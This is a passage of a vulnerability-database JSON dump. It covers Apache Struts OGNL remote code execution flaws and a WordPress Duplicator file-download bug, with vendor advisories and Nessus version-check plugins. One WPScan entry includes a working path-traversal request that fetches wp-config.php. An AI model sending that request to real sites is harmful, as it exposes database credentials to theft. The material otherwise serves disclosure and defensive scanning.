"CVE-2021-33196", "CVE-2021-33197", "CVE-2021-33198", "CVE-2021-36221", "CVE-2021-3634", "CVE-2021-3765", "CVE-2021-3807", "CVE-2021-38297", "CVE-2021-39293", "CVE-2021-3999", "CVE-2021-41771", "CVE-2021-41772", "CVE-2021-44716", "CVE-2021-44878", "CVE-2022-0155", "CVE-2022-0536", "CVE-2022-22822", "CVE-2022-22823", "CVE-2022-22824", "CVE-2022-22825", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23308", "CVE-2022-23772", "CVE-2022-23773", "CVE-2022-23806", "CVE-2022-23852", "CVE-2022-24329", "CVE-2022-24675", "CVE-2022-24785", "CVE-2022-24839", "CVE-2022-24921", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25315", "CVE-2022-25878", "CVE-2022-28327", "CVE-2022-29622"], "modified": "2022-10-25T13:11:39", "id": "DED899C681C4F01F658F5349E77058BDF8C51E88FADBC17AC63AAD856B4CADE5", "href": "https://www.ibm.com/support/pages/node/6831813", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2023-02-08T16:15:37", "description": " * [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \nForced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.\n * [CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \nThe fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. 
Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\nImpact\n\nUsing a forced Object-Graph Navigation Language (OGNL) evaluation on untrusted user input allows an attacker to perform remote code execution leading to security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-22T01:45:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2020-17530 and CVE-2021-31805", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-15T23:18:00", "id": "F5:K24608264", "href": "https://support.f5.com/csp/article/K24608264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:21:45", "bulletinFamily": "software", "cvelist": ["CVE-2020-35234"], "description": "The plugin has an optional debug log file generated with a random name, located in the plugin folder and which contains all email messages sent. 
However, this folder does not have any index page, allowing access to the log file on servers with directory listing enabled or misconfigured. This could allow attackers to gain unauthorised access to the blog by resetting the admin password, using the reset link obtained from the log.\n", "modified": "2020-12-15T06:02:15", "published": "2020-12-07T00:00:00", "id": "WPVDB-ID:14EADE63-E365-4BFC-A30E-9E2A7E739049", "href": "https://wpscan.com/vulnerability/14eade63-e365-4bfc-a30e-9e2a7e739049", "type": "wpvulndb", "title": "Easy WP SMTP < 1.4.3 - Debug Log Disclosure", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-15T22:04:18", "description": "The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions, v1.3.24 and v1.3.26; the vulnerability wasn't present in versions 1.3.22 and before.\n\n### PoC\n\nhttp://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php\n", "cvss3": {}, "published": "2020-02-19T00:00:00", "type": "wpvulndb", "title": "Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2021-01-04T06:01:37", "id": "WPVDB-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D", "href": "https://wpscan.com/vulnerability/35227c3a-e893-4c68-8cb6-ffe79115fb6d", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Directory traversal vulnerability in WordPress Duplicator plugin\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-08T00:00:00", "type": "dsquare", "title": "WordPress Duplicator < 1.3.28 Directory Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-03-08T00:00:00", "id": "E-724", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2023-07-19T15:33:58", "description": "The WordPress application running on the remote host has a version of the 'Duplicator' plugin that is affected by a directory traversal vulnerability in the duplicator_download and duplicator_init functions due to improper validation of user supplied input. 
An unauthenticated, remote attacker can exploit this issue by sending a specially crafted request to download arbitrary files.", "cvss3": {}, "published": "2020-09-02T00:00:00", "type": "nessus", "title": "WordPress Plugin 'Duplicator' Directory Traversal (CVE-2020-11738)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_DUPLICATOR_CVE-2020-11738.NBIN", "href": "https://www.tenable.com/plugins/nessus/140193", "sourceData": "Binary data wordpress_plugin_duplicator_cve-2020-11738.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:56:54", "description": "The WordPress application running on the remote host has a version of the 'Duplicator' plugin that is prior to 1.3.28 and, thus, is affected by an unauthenticated arbitrary file download vulnerability that can allow the attackers to download 'wp-config.php' and steal database credentials.", "cvss3": {}, "published": "2020-02-21T00:00:00", "type": "nessus", "title": "WordPress Plugin 'Duplicator' < 1.3.28 Unauthenticated Arbitrary File Download", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_DUPLICATOR_1_3_28.NASL", "href": "https://www.tenable.com/plugins/nessus/133846", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133846);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-11738\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"WordPress Plugin 'Duplicator' < 1.3.28 Unauthenticated Arbitrary File Download\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is 
vulnerable\nto unauthenticated arbitrary file download.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of\nthe 'Duplicator' plugin that is prior to 1.3.28 and, thus, is\naffected by an unauthenticated arbitrary file download vulnerability that can allow\nthe attackers to download 'wp-config.php' and steal database credentials.\");\n # https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f2901d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the 'Duplicator' plugin to version 1.3.28 or greater\nthrough the administrative dashboard.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11738\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"WordPress Duplicator < 1.3.28 Directory Traversal\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'duplicator');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version': '1.0.0', 'max_version': '1.3.26', 'fixed_version' : '1.3.28' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-16T15:01:13", "description": "The version of Apache Struts installed on the remote host is 2.x prior to 2.5.26. It is, therefore, affected by a a remote code execution vulnerability in its OGNL evaluation functionality due to insufficient validation of user input. 
An unauthenticated, remote attacker can exploit this to execute arbitrary commands on an affected host.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.5.26 RCE (S2-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2023-06-16T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_26.NASL", "href": "https://www.tenable.com/plugins/nessus/143599", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143599);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/16\");\n\n script_cve_id(\"CVE-2020-17530\");\n script_xref(name:\"IAVA\", value:\"2020-A-0565-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Struts 2.x < 2.5.26 RCE (S2-061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior to 2.5.26. It is, therefore, affected by a \na remote code execution vulnerability in its OGNL evaluation functionality due to insufficient validation of user \ninput. 
An unauthenticated, remote attacker can exploit this to execute arbitrary commands on an affected host.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.26 or later. Alternatively, apply the workarounds as referenced in the vendor \n security bulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nos = get_kb_item_or_exit('Host/OS');\nwin_local = 'windows' >< tolower(os);\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{'min_version':'2.0.0', 'fixed_version':'2.5.26'}];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-13T16:02:28", "description": "The version of Apache Struts installed on the remote host is prior to 2.5.26. It is, therefore, affected by a vulnerability as referenced in the S2-061 advisory.\n\n - Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. 
(CVE-2020-17530)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-06T00:00:00", "type": "nessus", "title": "Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2023-08-09T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_S2-061.NASL", "href": "https://www.tenable.com/plugins/nessus/151425", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151425);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/09\");\n\n script_cve_id(\"CVE-2020-17530\");\n script_xref(name:\"IAVA\", value:\"2020-A-0565-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by Possible Remote Code Execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is prior to 2.5.26. It is, therefore, affected by a\nvulnerability as referenced in the S2-061 advisory.\n\n - Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code\n execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. 
(CVE-2020-17530)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.26 or later. Alternatively, apply the workaround as referenced in in the vendor's\nsecurity bulletin\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar os = get_kb_item_or_exit('Host/OS');\nvar win_local = ('windows' >< tolower(os));\n\nvar app_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.25', 'fixed_version' : '2.5.26' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:29:36", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {}, "published": "2022-05-18T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.5.29 Remote Code Execution (S2-062)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2022-05-18T00:00:00", "cpe": ["cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113226", "href": "https://www.tenable.com/plugins/was/113226", "sourceData": "No source data", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:57", "description": "The version of Apache Struts installed on the remote host is prior to 2.5.30. It is, therefore, affected by a vulnerability as referenced in the S2-062 advisory.\n\n - The fix issued for CVE-2020-17530 ( S2-061 ) was incomplete. 
Still some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.\n Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation. (CVE-2021-31805)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2.0.0 < 2.5.30 Possible Remote Code Execution vulnerability (S2-062)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-12T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_S2-062.NASL", "href": "https://www.tenable.com/plugins/nessus/159667", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159667);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/12\");\n\n script_cve_id(\"CVE-2021-31805\");\n\n script_name(english:\"Apache Struts 2.0.0 < 2.5.30 Possible Remote Code Execution vulnerability (S2-062)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by Possible Remote Code Execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is prior to 2.5.30. It is, therefore, affected by a\nvulnerability as referenced in the S2-062 advisory.\n\n - The fix issued for CVE-2020-17530 ( S2-061 ) was incomplete. Still some of the tag's attributes could\n perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.\n Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security\n degradation. 
(CVE-2021-31805)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-062\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.30 or later. Alternatively, apply the workaround as referenced in in the vendor's\nsecurity bulletin\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31805\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar os = get_kb_item_or_exit('Host/OS');\nvar win_local = ('windows' >< tolower(os));\n\nvar app_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.29', 'fixed_version' : '2.5.30' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:55", "description": "The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore, affected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). 
The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property without further validation, the provided OGNL expression contained in the skillName attribute gets evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only referencing validated values in the given expression. However, when referencing unvalidated user input in the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well as other classes from these standard library packages are not properly protected by the framework to deny access to potentially harmful underlying properties. 
(CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-08-14T00:00:00", "type": "nessus", "title": "Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/139607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139607);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore,\naffected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to\n certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when\n a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code\n Execution (RCE). 
The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when\n the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify\n by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the\n skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property\n without further validation, the provided OGNL expression contained in the skillName attribute gets\n evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation\n is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only\n referencing validated values in the given expression. However, when referencing unvalidated user input in\n the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes\n mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack\n vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may\n manipulate the request such that the working copy of the uploaded file is set to read-only. As a result,\n subsequent actions on the file will fail with an error. It might also be possible to set the Servlet\n container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior\n to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well\n as other classes from these standard library packages are not properly protected by the framework to deny\n access to potentially harmful underlying properties. 
